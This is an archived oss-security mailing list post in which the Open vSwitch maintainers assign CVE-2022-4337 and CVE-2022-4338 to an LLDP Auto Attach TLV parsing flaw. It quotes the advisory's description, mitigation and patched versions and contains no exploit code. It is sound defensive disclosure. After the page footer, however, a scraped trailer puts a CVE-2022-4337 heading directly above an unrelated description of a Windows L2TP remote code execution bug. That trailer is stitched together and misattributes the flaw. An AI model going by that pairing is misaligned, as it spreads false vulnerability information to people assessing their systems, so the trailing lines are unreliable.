    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[<thread-prev\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 21 Dec 2022 12:10:03 +0100
From: Ilya Maximets <i.maximets@....org>
To: oss-security@...ts.openwall.com, ovs-announce@...nvswitch.org,
 ovs-discuss <ovs-discuss@...nvswitch.org>
Cc: i.maximets@....org, Aaron Conole <aconole@...hat.com>,
 Qian Chen <cq674350529@...il.com>, John Helmert III <ajak@...too.org>
Subject: Re: \[ADVISORY\] LLDP underflow while parsing malformed Auto Attach TLV
 (Open vSwitch)

On 12/20/22 22:39, Ilya Maximets wrote:
> Description
> ===========
> 
> Multiple versions of Open vSwitch are vulnerable to crafted LLDP
> packets causing denial of service, and data underflow attacks.
> Triggering the vulnerabilities requires LLDP processing to be enabled
> for a specific port.  Open vSwitch versions prior to 2.4.0 are not
> vulnerable.
> 
> The Common Vulnerabilities and Exposures project (cve.mitre.org)
> did not assign the identifier to this issue yet.  The identifier will
> be communicated separately.

Following CVE identifiers have been allocated for the issue (one per
TLV type since they can have a slightly different effect):

 - CVE-2022-4337 for Out-of-Bounds Read in Organization Specific TLV
 - CVE-2022-4338 for Integer Underflow in Organization Specific TLV

The fix referenced in this advisory covers both issues.

> This issue does not affect the \`lldpd'
> project, although they share a code base.  The issue is related to
> parsing the Auto Attach TLVs, which is specific to the Open vSwitch
> implementation.
> 
> 
> Mitigation
> ==========
> 
> For any version of Open vSwitch, preventing LLDP packets from reaching
> Open vSwitch mitigates the vulnerability.  We do not recommend
> attempting to mitigate the vulnerability this way because of the
> following difficulties:
> 
>     - Open vSwitch obtains packets before the iptables host firewall,
>       so ebtables on the Open vSwitch host cannot ordinarily block the
>       vulnerability.
> 
>     - If Open vSwitch is configured to receive and transmit LLDP
>       messages, the required functionality will need to be disabled
>       potentially disrupting the network.
> 
> We have found that Open vSwitch is subject to a denial of service, and
> possibly a remote code execution exploit when LLDP processing is enabled
> on an interface.  By default, interfaces are not configured to process
> LLDP messages.
> 
> 
> Fix
> ===
> 
> Patches to fix these vulnerabilities in Open vSwitch 2.13.x and newer are
> applied to the appropriate branches, and the original patch is located
> at:
> 
>    https://mail.openvswitch.org/pipermail/ovs-dev/2022-December/400596.html
> 
> Recommendation
> ==============
> 
> We recommend that users of Open vSwitch apply the respective patch, or
> upgrade to a known patched version of Open vSwitch.  These include:
> 
> \* 3.0.3
> \* 2.17.5
> \* 2.16.6
> \* 2.15.7
> \* 2.14.8
> \* 2.13.10
> 
> 
> Acknowledgments
> ===============
> 
> The Open vSwitch team wishes to thank the reporter:
> 
>   Qian Chen <cq674350529@...il.com>
> 

**Download attachment "**OpenPGP\_0xB9F7EC77C829BF96.asc**" of type "**application/pgp-keys**" (4740 bytes)**

**Download attachment "**OpenPGP\_signature**" of type "**application/pgp-signature**" (841 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-4337: security - Re: [ADVISORY] LLDP underflow while parsing malformed Auto Attach TLV (Open vSwitch)

Windows Layer 2 Tunneling Protocol (L2TP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21543, CVE-2023-21546, CVE-2023-21556, CVE-2023-21679.

Tag

#rce